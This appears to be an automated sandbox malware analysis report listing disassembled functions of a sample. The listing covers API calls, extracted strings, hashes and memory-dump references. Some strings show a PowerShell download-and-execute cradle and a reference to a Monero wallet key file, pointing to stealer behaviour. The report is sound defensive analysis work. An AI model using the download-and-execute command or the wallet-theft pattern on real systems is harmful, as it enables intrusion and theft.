                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 11e7786939399dafd02f473276b2a185c402d62c46f62af2909560beddbda477
                              • Instruction ID: 765e87513dbaaae75a2fdaa2f3b445dde7baf82764d28dc5f07e325306fbc69e
                              • Opcode Fuzzy Hash: 11e7786939399dafd02f473276b2a185c402d62c46f62af2909560beddbda477
                              • Instruction Fuzzy Hash: DC31F3B4A00209EFDB18DF94C985BEE77BABF48304F108258E911A7390D775AA41CFA1
                              Function 00694780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,0148E5F0), ref: 006947DB
                                • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00694801
                              • lstrcat.KERNEL32(?,?), ref: 00694820
                              • lstrcat.KERNEL32(?,?), ref: 00694834
                              • lstrcat.KERNEL32(?,0147B658), ref: 00694847
                              • lstrcat.KERNEL32(?,?), ref: 0069485B
                              • lstrcat.KERNEL32(?,0148DA20), ref: 0069486F
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 00698D90: GetFileAttributesA.KERNEL32(00000000,?,00681B54,?,?,006A564C,?,?,006A0E1F), ref: 00698D9F
                                • Part of subcall function 00694570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00694580
                                • Part of subcall function 00694570: RtlAllocateHeap.NTDLL(00000000), ref: 00694587
                                • Part of subcall function 00694570: wsprintfA.USER32 ref: 006945A6
                                • Part of subcall function 00694570: FindFirstFileA.KERNEL32(?,?), ref: 006945BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: db0faa8aeac9e54bec5eacabfa5c1789ea3bef9fef31d560ddf27f1ea503c7b2
                              • Instruction ID: d5c2a67e9a39eb1cbaa07e4991f9ca75f096378449b7f9dab660a76c21a7b2e0
                              • Opcode Fuzzy Hash: db0faa8aeac9e54bec5eacabfa5c1789ea3bef9fef31d560ddf27f1ea503c7b2
                              • Instruction Fuzzy Hash: 37316EB290021CABCB54FBB0DC85EE9737DBB48704F40459DB31996081EE749689CB9A
                              Function 00692C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00692D85
                              Strings
                              • <, xrefs: 00692D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00692D04
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00692CC4
                              • ')", xrefs: 00692CB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: a52cfcf191093cf4dfbc2cd743a1e6441c92277635060ce7b0825e4cc20ebaea
                              • Instruction ID: 2cdf2450af6432163caf6e7ac4337061ccc5120c63ebada4283a0595b62eb039
                              • Opcode Fuzzy Hash: a52cfcf191093cf4dfbc2cd743a1e6441c92277635060ce7b0825e4cc20ebaea
                              • Instruction Fuzzy Hash: 3541CB718102189ADF54FBE0C992BEDB7BABF14300F40411DE006A7591DF746A4ACFDA
                              Function 00689E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00689F41
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 99b75406ac2b0171976ee0e136c84de08b980b9a0561a42c43cfb1d923c2111b
                              • Instruction ID: 951a045b6476dbaf8debcec24796cebed710a155ac255388991a9abac25171fc
                              • Opcode Fuzzy Hash: 99b75406ac2b0171976ee0e136c84de08b980b9a0561a42c43cfb1d923c2111b
                              • Instruction Fuzzy Hash: 30613E70A10208DBDF14EFA4CD96FED77BAAF45304F008118F90A5F581EB706A06CB96
                              Function 006940B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0148DDA0,00000000,00020119,?), ref: 006940F4
                              • RegQueryValueExA.ADVAPI32(?,0148E530,00000000,00000000,00000000,000000FF), ref: 00694118
                              • RegCloseKey.ADVAPI32(?), ref: 00694122
                              • lstrcat.KERNEL32(?,00000000), ref: 00694147
                              • lstrcat.KERNEL32(?,0148E560), ref: 0069415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: c9b094a5120bd65a3a8586c054f7ced27c40e4e39b15cb71407ddf7996fb3267
                              • Instruction ID: 07802b373791e756e176d0fff57a86ebd99e98c4738a18932a3b2143891a84a3
                              • Opcode Fuzzy Hash: c9b094a5120bd65a3a8586c054f7ced27c40e4e39b15cb71407ddf7996fb3267
                              • Instruction Fuzzy Hash: 5A4189B6D0010C6BDB18FBA0EC56FFE737DBB88304F00455DB61697181EA755B888B92
                              Function 00697E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00697E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0147C010,00000000,00020119,?), ref: 00697E5E
                              • RegQueryValueExA.ADVAPI32(?,0148DA80,00000000,00000000,000000FF,000000FF), ref: 00697E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00697E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: a24b84fbabd029b173358b7a2c97b4e895670a37fdb4bdd051fcc3337baa7d1d
                              • Instruction ID: 7ada373f0df84e31523477aa254055fea2af42020d433445b9c9c0064b37c3f9
                              • Opcode Fuzzy Hash: a24b84fbabd029b173358b7a2c97b4e895670a37fdb4bdd051fcc3337baa7d1d
                              • Instruction Fuzzy Hash: 1F1170B1A44209EBDB08CF95DD49FBBBBBDFB44B14F104169F605A7680D7745C018BA1
                              Function 00699260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(0148E278,?,?,?,0069140C,?,0148E278,00000000), ref: 0069926C
                              • lstrcpyn.KERNEL32(008CAB88,0148E278,0148E278,?,0069140C,?,0148E278), ref: 00699290
                              • lstrlen.KERNEL32(?,?,0069140C,?,0148E278), ref: 006992A7
                              • wsprintfA.USER32 ref: 006992C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 624853afe8aa9417f01e1385c6b721e1c79f1f0fc7c7bffe2276f6fafd7fd447
                              • Instruction ID: 22b44be23559a09b600e01ea1711c54c8118c5f2a40de5a83ef9a6f1b77d9691
                              • Opcode Fuzzy Hash: 624853afe8aa9417f01e1385c6b721e1c79f1f0fc7c7bffe2276f6fafd7fd447
                              • Instruction Fuzzy Hash: 8D01977550010CFFCB08DFECD988EAE7BB9FB44368F148148F9099B604C635AE509B91
                              Function 006812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                              • RegCloseKey.ADVAPI32(?), ref: 006812FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: bea8292ea5f9cdee7ad0d77bd5c422a3f078db5b6fdf4d201b8dcf8ec57905cd
                              • Instruction ID: 4af25865cfd4aa7625a67362c942dbc0ed2a456675e6f40a157ebc6525b52e37
                              • Opcode Fuzzy Hash: bea8292ea5f9cdee7ad0d77bd5c422a3f078db5b6fdf4d201b8dcf8ec57905cd
                              • Instruction Fuzzy Hash: 07011DB9A4020CBBDB04DFE0DC49FAEB7B8FB48705F008159FA0597280D6719A018B51
                              Function 0069C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 25b17dbdcd913aaad30a316e8c4f490eb3581d540c7694608b904c5a4549a7d0
                              • Instruction ID: b862dc04272d14ee22ac564ba5d931ba814a78f32c8ad17f627cb8763603f9dc
                              • Opcode Fuzzy Hash: 25b17dbdcd913aaad30a316e8c4f490eb3581d540c7694608b904c5a4549a7d0
                              • Instruction Fuzzy Hash: 194134B110078C5EDF218B24CD84FFBBBEEAF01314F1444ECE98A86582E2319A45DF24
                              Function 00696630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00696663
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00696726
                              • ExitProcess.KERNEL32 ref: 00696755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 77ff7c66eb4e8fae6ed9f5a6e9d42807a0a0ee5fd2839aafbee09e45f4c6ec6c
                              • Instruction ID: b6e6a7264e95985509722462fbf47d10df5a47f5d92e5fd2bac7cbf7f3262185
                              • Opcode Fuzzy Hash: 77ff7c66eb4e8fae6ed9f5a6e9d42807a0a0ee5fd2839aafbee09e45f4c6ec6c
                              • Instruction Fuzzy Hash: 393127B1801218ABDB58EB90DD86FDEB7BDBF04300F404189F20966191DF746A48CFAA
                              Function 006987C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0E28,00000000,?), ref: 0069882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00698836
                              • wsprintfA.USER32 ref: 00698850
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
